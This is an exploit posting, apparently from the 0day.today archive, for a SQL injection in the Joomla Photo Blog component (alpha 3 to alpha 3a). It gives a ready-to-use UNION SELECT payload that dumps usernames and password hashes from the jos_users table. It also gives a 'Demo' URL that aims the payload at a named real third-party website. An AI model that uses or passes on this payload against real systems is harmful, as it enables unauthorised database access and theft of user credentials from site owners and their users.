Joomla Photo Blog alpha 3 - alpha 3a SQL Injection

2009-10-23T00:00:00
ID 1337DAY-ID-9946
Type zdt
Reporter kaMtiEz
Modified 2009-10-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================
Joomla Photo Blog alpha 3 - alpha 3a SQL Injection
==================================================

/**************************************************************************
 
[~] Joomla Component com_photoblog SQL injection vulnerability - (category)
[~] Author  : kaMtiEz
[~] Homepage    : http://www.indonesiancoder.com
 
**************************************************************************/
 
[ Software Information ]
 
[+] Vendor : http://webguerilla.net/
[+] Download : http://webguerilla.net/downloads/3-components-for-joomla-1
[+] version : alpha 3 - alpha 3a
[+] Vulnerability : SQL injection

===========================================================================
[ Vulnerable File ]
 
http://127.0.0.1/index.php?option=com_photoblog&view=blogs&category=[INDONESIANCODER]
 
[ Exploit ]
 
-666/**/union/**/select/**/6,concat(0x3a,username,password),6,6,version(),6,6,6,6,6,6,6,6,6/**/from/**/jos_users/*
 
[ Demo ]
 
http://www.wideskygroup.com/index.php?option=com_photoblog&view=blogs&category=-666/**/union/**/select/**/6,concat%280x3a,username,password%29,6,6,version%28%29,6,6,6,6,6,6,6,6,6/**/from/**/jos_users/*
===========================================================================



#  0day.today [2018-01-01]  #